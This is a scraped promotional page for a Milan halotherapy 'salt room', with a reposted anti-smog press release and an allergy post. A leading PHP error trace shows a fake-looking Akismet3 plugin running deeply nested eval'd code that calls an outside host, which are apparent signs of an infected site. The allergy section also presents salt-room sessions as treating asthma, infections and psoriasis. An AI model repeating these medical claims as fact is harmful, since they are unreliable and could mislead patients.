Warning: file_get_contents(http://ip.googlescript.com/54.225.35.215?api_key=e7d52430614c8319dbde9ba6cb49993e&group=lib-js&ua=CCBot%252F2.0%2B%2528http%253A%252F%252Fcommoncrawl.org%252Ffaq%252F%2529&ip=54.225.35.215): failed to open stream: HTTP request failed! HTTP/1.0 500 Internal Server Error in /web/htdocs/www.namur.it/home/wp-content/plugins/Akismet3/Akismet3.php(23) : runtime-created function(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 113 Namur | Il posto del respiro

ISCRIVITI ALLA NEWSLETTER

Hai sempre desiderato un posto in cui i liberarti dal rumore, dallo smog e dallo stress della città, per RESPIRARE aria pulita e farti del bene in modo naturale? Questo posto ora c’è. E’ Namur, il posto del respiro. Nel cuore di Milano, puoi trovare la nuova ed accogliente stanza del sale, in cui viene riprodotto il microclima che in natura si può trovare solo in riva al mare.

BAMBINI

UN POSTO NUOVO IN CUI FARE UN PIENO DI ARIA PULITA

Il tuo pediatra consiglia di portare i bambini al mare, ma le vacanze sono ancora lontane? Ora puoi cominciare a prenderti cura di loro in un modo del tutto naturale, a pochi passi da casa, nella nostra stanza del sale.

Scopri di più

ADULTI

L'INQUINAMENTO TI SOFFOCA?
IL RIMEDIO È NELLA NOSTRA STANZA DEL SALE


La stanza del sale è come un'oasi in città per respirare aria pulita.
E' un 'sistema' naturale per ripulire le vie respiratorie e attenuare i danni correlati ad una cattiva respirazione.

Scopri di più

TERZA ETÀ

LA VISTA RIMARRÀ INCANTATA DAL CANDORE DELLE PARETI E DALL’ARMONIA DEI COLORI

L'atmosfera in cui si svolgono le sedute è pervasa dal profumo di un elemento umile e allo stesso tempo prezioso, conosciuto fin dall’antichità per le sue innumerevoli proprietà.

Scopri di più

Ultime News

Anche Namur è ANTISMOG!!

logo-negozi

Negozi Amici dell’Aria: a Milano Genitori Antismog vuole sensibilizzare i commercianti.

A Milano Genitori Antismog chiede la collaborazione dei negozi nella lotta all’inquinamento, consapevole di quanto ogni giorno cresca il desiderio di tanti di vivere in una città che sia finalmente a misura di persona e che anche molti commercianti comincino a convincersi che la salute dei polmoni e la qualità della vita possano andare d’accordo con la salute… degli affari!

L’associazione Genitori Antismog ha lanciato ieri 31 marzo il progetto NEGOZI AMICI DELL’ARIA, che prevede la costituzione di un network di negozianti e esercizi commerciali sensibili al tema dell’inquinamento dell’aria e del traffico.
Al progetto hanno già aderito oltre 30 attività commerciali – ovviamente negozi di bici come Rossignoli o La Ciclistica, ma anche negozi alimentari come Effecorta e Eataly, bar e gelaterie come Stick House e Tomaselli, fino ai negozi per la casa come Moroni Gomma – e negli ultimi giorni altri ancora hanno manifestato il desiderio di unirsi. I negozi che hanno aderito finora rappresentano diverse categorie commerciali e si trovano in piena AreaC così come in periferia. I Genitori Antismog contano di superare le 100 adesioni entro fine anno. (Un elenco completo su http://negozi.genitoriantismog.it/mappa)

Oggi assistiamo al paradosso che per poter fare shopping passeggiando in tranquillità, consumando un pasto fuori casa, si debba prendere l’auto per andare in un centro commerciale dove sono riprodotte delle città artificiali, con tanto di panchine e fontane in finti boulevard e dove smog e traffico sono lontani dalla vista mentre nelle città, in alcune vie, avanza la desertificazione commerciale.
“Le nostre città sono sempre state dei centri commerciali naturali, anche se negli ultimi decenni le auto hanno preso tutti gli spazi disponibili – ha dichiarato Lucia Robatto, responsabile del progetto — e oggi per avere “spazio libero” bisogna proprio prendere l’auto e uscire dalla città. Anche per contrastare questo abbiamo deciso di riunire i negozianti che con noi vogliono che le città mettano al centro le persone e non le auto”.

Gli esercizi compreso “Namur – Il Posto del Respiro” aderiscono al progetto sottoscrivendo un “manifesto” in 5 punti (1. Condividiamo la visione di una città a misura di persona 2. Accogliamo le politiche di moderazione del traffico 3. Ci impegniamo a contenere sprechi ed emissioni 4. Sensibilizziamo i fornitori sull’uso di mezzi a basso impatto ambientale 5. Offriamo ai clienti consegne a impatto zero con bike messengers) e si rendono promotori dei valori espressi. Una vetrofania dedicata li identifica come sostenitori dell’iniziativa.

Negozi Amici dell’Aria è quindi innanzitutto un progetto culturale che vuole creare consapevolezza e offrire alla città un’immagine partecipativa dei commercianti, convinti che la salute dei polmoni possa conciliarsi con la salute degli affari.
Diversi studi internazionali presentati nel corso della serata infatti dimostrano che non è vero il luogo comune che per i negozi gli affari arrivano per lo più dai clienti motorizzati, e anzi spesso favorire la mobilità dolce rappresenta per tante attività un incremento degli incassi.
Una richiesta forte fatta dai Genitori Antismog durante la conferenza è che venga detassata l’occupazione di suolopubblico per quegli esercizi commerciali che vogliano arricchire lo spazio urbano a proprie spese con elementi di arredo, come panchine, tavoli, rastrelliere per bici, piante ecc.
“Chiediamo ai candidati sindaco di prendere posizione su questa richiesta – ha detto Marco Ferrari, presidente dei Genitori Antismog – perché non è tollerabile che secondo le stesse fonti del Comune di Milano ogni giorno 50.000 veicoli sostino abusivamente, e gratuitamente, sui marciapiedi degradando lo spazio urbano mentre un commerciante deve pagare e rispettare rigide regolamentazioni se vuole mettere una panchina o un vaso sull’ampio marciapiede di fronte alla sua attività”.
Secondo i calcoli fatti dai Genitori Antismog ogni giorno almeno 400.000 mq di marciapiedi e parterre alberati sono occupati abusivamente da auto e moto. Una superficie pari all’intero Parco Sempione.

Tratto dal comunicato stampa di “Genitori Antismog” del 31/3/2016

Primavera, tempo di allergie?

 

Con l’arrivo della primavera si intensificano i disturbi legati alle allergie: occhi che lacrimano, starnuti e nasi che colano, tosse, prurito e attacchi di asma.

Mentre la natura si risveglia, i pollini indispensabili alla vita, per chi soffre di allergia, si trasformano in un vero incubo e aumenta il ricorso ai farmaci (cortisone e antistaminici in particolare). Da noi potete trovare un trattamento sempre più apprezzato dalle mamme e spesso suggerito dai pediatri. Il sale disperso nella stanza svolge un’azione antibatterica e contribuisce a migliorare la respirazione, contrastando gli effetti nocivi di pollini, inquinanti e allergeni presenti nell’aria. In molti paesi europei la cd. “haloterapia” viene utilizzata con successo nel trattamento delle patologie respiratorie, dalla cura del raffreddore e dell’influenza, alle bronchiti, sino all’asma, riniti, sinusiti e appunto, alle allergie. Le proprietà antibatteriche ed antinfiammatorie dell’aerosol secco di cloruro di sodio si sono dimostrate efficaci nel trattamento di infezioni a carico dell’orecchio e della pelle come dermatiti e psoriasi. I benefici si manifestano sotto forma di diminuzioni delle infiammazioni bronchiali, di rafforzamento del sistema immunitario e conseguente riduzione della reazione allergica ai pollini, di miglioramento della qualità del sonno.

Namur è a Milano, in Via Spartaco 29 (ingresso da Via Paullo 16).
Siamo aperti dal martedì al sabato dalle 10 alle 20 con orario contìnuato. Lunedì dalle 14 alle 20. Chiusura domenica.
Passa a trovarci quando vuoi ma, per prenotare la tua seduta, ti consigliamo di chiamarci prima allo 02/87073490 o di mandare una mail a: respira@namur.it